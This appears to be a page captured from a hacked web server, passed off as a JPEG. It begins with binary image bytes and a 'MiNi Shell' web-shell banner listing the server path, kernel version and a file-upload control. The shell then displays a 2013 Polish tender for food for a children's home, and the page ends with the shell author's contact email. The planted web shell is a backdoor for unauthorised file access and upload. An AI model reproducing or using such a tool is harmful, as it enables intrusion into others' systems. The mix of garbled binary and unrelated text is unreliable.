JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131129/492434-N-2013.html

<p class="kh_header"><b>Tarnów Opolski: Zakup żywności dla potrzeb wychowanków Domu Dziecka im.J. Korczaka  w Tarnowie Opolskim</b><br>
<b>Numer ogłoszenia: 492434 - 2013; data zamieszczenia: 29.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Dziecka im. Janusza Korczaka , ul. Korczaka 1, 46-050 Tarnów Opolski, woj. opolskie, tel. 0 77 46 44 112, faks 0 77 46 44 112.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://ddtarnowopolski.biuletyn.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup żywności dla potrzeb wychowanków Domu Dziecka im.J. Korczaka  w Tarnowie Opolskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest Zakup żywności dla potrzeb wychowanków Domu Dziecka im.J.Korczaka w Tarnowie Opolskim


1.	Określenie przedmiotu zamówienia
1.1. Nazwa nadana zamówieniu przez Zamawiającego: Zakup żywności dla potrzeb wychowanków Domu Dziecka im. J. Korczaka w Tarnowie Opolskim
1.2.Rodzaj zamówienia: dostawa.
1.3.Określenie przedmiotu oraz wielkości lub zakresu zamówienia:
CZĘŚĆ I : RÓŻNE PRODUKTY SPOŻYWCZE - CPV 15.800000-8, CPV-01.2 CPV- 15.3, CPV-15.4, CPV-15.6 , CPV -15.2, CPV-03.1,
CZĘŚĆ II: PIECZYWO  CPV 15810000-9,
CZĘŚĆ III:  MROŻONKI CPV -15222000-0, 15331170-9 ,	CZĘŚĆ IV: MIĘSO I WĘDLINY CPV-15.1,	CZĘŚĆ V: NABIAŁ MLEKO I PRZETWORY MLECZNE CPV- 15.5,	CZĘŚĆ VI: JAJA CPV 03.1,	Część VII: DRÓB  MROŻONY 15.1 	Część VIII. OWOCE I WARZYWA  CPV 011, 012, 013, 153.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca   powinien posiadać uprawnienia do wykonywania dostaw żywności , w szczególności zezwolenie , koncesję,licencję wynikające z właściwego rejestru albo wpisu do ewidencji gospodarczej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadać wiedzę i doświadczenie w dostawie żywności</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponować transportem do przewozu żywności(tych części , na które składa ofertę) odpowiadającym wymogom HACCP</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponować osobami zdolnymi do dostawy żywności</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadać środki finansowe lub zdolności kredytowe umożliwiające realizację zamówienia w przeciągu 12 m-cy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ddtarnowopolski.biuletyn.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Dziecka im.J.Korczaka w Tarnowie Opolskim ul.Korczaka 1  46-050 Tarnów Opolski 
od poniedziałku do piątku w godzinach  7.30 do 15.30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2013 godzina 09:30, miejsce: Dom Dziecka  im.J.Korczaka w Tarnowie Opolskim  ul.Korczaka 1 46-050 Tarnów Opolski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Różne Produkty Spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I : RÓŻNE PRODUKTY SPOŻYWCZE - CPV 15.800000-8, CPV-01.2 CPV- 15.3, CPV-15.4, CPV-15.6 , CPV -15.2, CPV-03.1,
ananas w puszcze ok.500g	szt.	50
budyń w proszku ok.35g. Różne smaki	szt.	300
brzoskwinia w syropie ok. 800g	szt.	60
bułka tarta 0,5kg	szt.	60
cukier 1kg	kg	500
ciastka kruche różne 	kg	160
cukier waniliowy ok. 20g	szt.	130
chrupki kukurydziane ok.100g	szt.	300
cynamon ok.20g	szt.	30
cukier puder ok.500g.	szt.	30
dżemy niskosłodzone ok. 300g różne smaki	szt.	300
groszek zielony konserwowy ok. 400g	szt.	100
galaretka w proszku ok. 90g różne smaki	szt.	400
herbata owocowa rozpuszcz. ok.300g różne smaki	szt.	100
herbata zwykła ekspresowa 100 szt. w opakowaniu	opakowań	50
herbata owocowa ekspresowa 100szt w opakowaniu	opakowań	50
herbata owocowa ekspresowa ok. 30szt w opakowaniu	opakowań	30
herbata granulowana zwykła 100 g	szt.	30
kasza jęczmienna 1kg	kg	30
kasza gryczana 1kg	kg	30
kakao rozpuszczalne ok.350g	szt.	100
kakao ciemne 100g	szt.	20
		
kasza manna 1kg	kg	30
koncentrat pomidorowy 30% ok.170g	szt.	180
kawa zbożowa ekspresowa ok. 20 szt. w opakowaniu	opakowań	30
kawa zbożowa rozpuszczalna ok.150 g	szt.	30
kisiel w proszku ok. 40 g różne smaki	szt.	300
kukurydza w puszcze ok. 400 g	szt.	200
kwasek cytrynowy ok. 20 g	szt.	50
ketchup 500g	szt.	200
konserwa rybna w oleju lub w pomidorach ok. 170 g	szt.	150
kasza kukurydziana 1 kg	kg	20
kasza jaglana ok. 400 g	szt.	40
krem czekoladowy ok. 400 g	szt.	100
liść laurowy ok. 6 g	szt.	30
mąka pszenna typ 500 1kg	kg	300
mąka ziemniaczana 1kg 	kg	40
makaron świderki i kolanka ok. 500 g	szt.	200
makaron rosołowy 250  g 	szt.	100
makaron zacierka 250 g	szt.	50
majonez ok. 300 ml	szt.	100
majeranek ok. 8 g	szt.	40
musztarda ok. 180 g	szt.	50
miód naturalny wielokw. Ok. 400 g	szt.	100
45	musli owocowe ok. 300 g		szt.	150
46	olej rzepakowy 1 l		szt.	170
47	oliwa z oliwek extra virgin 0,5 l		szt.	30
48	proszek do pieczenia ok. 20 g		szt.	100
49	płatki owsiane 500 g		szt.	30
50	płatki kukurydziane ok. 250 g 		szt.	200
51	pasztet drobiowy ok. 130 g 		szt.	350
52	pieprz naturalny mielony ok. 20 g		szt.	80
53	papryka słodka mielona ok. 20 g		szt.	80
54	paluszki różne smaki ok. 100 g		szt.	500
55	przyprawa bazylia ok. 10 g		szt.	30
56	przyprawa oregano ok. 10 g		szt.	30
57	paprykarz rybny ok. 130 g		szt.	200
58	ryż  1 kg		kg	130
59	sól spożywcza jodowana 1 kg		kg	100
60	suchary ok. 290 g		szt.	50
61	sok owocowy wysokosłodzony ok. 420 ml		szt.	130
62	soki przecierowe owocowe ok. 300 ml różne smaki		szt.	1200
63	woda mineralna gazowana i niegazowana 0,5 l		szt.	600
64	woda mineralna niegazowana 5 l		szt.	100
65	wafle różne smaki 		kg	100
66	ziele angielskie ok. 15 g		szt.	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CPV  15810000-9

bułka zwykła ok.90g	szt.	2500
bułka śniadaniowa ok.70 g	szt.	1400
bułka grahamka ok.70g	szt.	1400
bułka paluch ok.40g	szt.	800
bułka weka ok.400g	szt.	250
drożdżówka ok.90g różne nadzienia	szt.	1000
pączek z marmoladą ok.90g	szt.	200
chleb zwykły ok.1 kg	szt.	900
chleb wieloziarnisty ok.450g	szt.	500
chleb razowy ok.500g	szt.	500
rogal maślany ok.80g	szt.	1400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CPV 15222000-0  ,  15331170-9

1	filet rybny z miruny nieglazurowany	kg	100
2	filet rybny z soli nieglazurowany	kg	70
3	fasolka szparagowa żółta 2,5-5 kg	kg	30
4	fasolka szparagowa zielona 2,5-5 kg	kg	30
5	frytka karbowana do piekarnika 1kg	kg	100
6	kalafior 2,5-5 kg	kg	30
7	włoszczyzna paski 4 składnikowa 2,5-5kg	kg	400
8	bukiet warzyw 3 składnikowy (brokuł+kalafior+marchew) 2,5-5 kg	kg	80
9	mieszanka kompotowa najmniej 3 składnikowa 2,5-5 kg	kg	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mięso i Wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CPV 15.1


1	kiełbasa parówka cienka wp.	kg	100
2	kiełbasa śląska wp.	kg	150
3	kiełbasa szynkowa wp.	kg	50
4	kiełbasa krakowska sucha wp.	kg	50
5	kiełbasa żywiecka wp.	kg	30
6	kiełbasa biała parzona wp.	kg	30
7	szynka gotowana wp.	kg	50
8	szynka cygańska wp.	kg	30
9	boczek wędzony 	kg	20
10	słonina świeża	kg	30
11	mięso łopatka wp.  b/k	kg	200
12	mięso szynka wp. b/k, b/s	kg	100
13	mięso wołowe gulasz b/k	kg	100
14	mięso schab wp z kością	kg	60
15	wątroba wieprzowa	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Nabiał mleko i przetwory mleczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CPV 15.5

1	jogurt owocowy ok.150g różne smaki	szt.	2000
2	kefir ok.400g	szt.	200
3	masło extra 82% tł. 200g.	szt.	1800
4	mleko folia 2% tł. 0,9 l	szt.	4000
5	maślanka naturalna ok. 350g	szt.	150
6	ser żółty ok. 45 % tł.	kg	150
7	serek topiony 100g różne smaki	szt.	600
8	serek homogenizowany ok. 125g różne smaki	szt.	1400
9	śmietana 18% tłuszczu ok. 400g	szt.	500
10	śmietana kremówka 30% ok.180g	szt.	20
11	twaróg półtłusty	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CPV 03.1


jaja kurze kl. M	szt.	7000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Drób mrożony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CPV 15.1

1	filet z kurczaka 	kg	100
2	ćwiartka z kurczaka	kg	100
3	porcja rosołowa	kg	80
4	skrzydełka z kurcząt	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CPV 011.012,013,153

1	arbuz	kg	180
2	banan	kg	700
3	buraki czerwone	kg	150
4	brokuł	szt.	50
5	botwinka	pęczków	30
6	brzoskwinia	kg	50
7	cytryna	kg	40
8	cebula	kg	80
9	czosnek	szt.	30
10	czereśnie 	kg	30
11	fasola sucha Piękny Jaś	kg	20
12	jabłka	kg	1300
13	kapusta kwaszona 500 g	szt.	200
14	kapusta pekińska	kg	50
15	kapusta biała	kg	80
16	kapusta biała	szt.	50
17	kapusta czerwona	kg	50
18	kapusta czerwona	szt.	10
19	kalafior	szt.	50
20	kiwi	kg	120
21	mandarynka	kg	130
22	marchew	szt.	200
23	nektaryna	kg	60
24	ogórek kwaszony ok. 500 g	szt.	250
25	ogórek zielony	kg	130
26	papryka czerwona 	kg	50
27	pomidor	kg	160
28	pomarańcza	kg	100
29	pieczarki	kg	20
30	rzodkiewka	pęczków	150
31	szczypiorek	pęczków	120
32	sałata lodowa	szt.	70
33	sałata masłowa	szt.	100
34	truskawki	kg	60
35	ziemniaki	kg	2300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com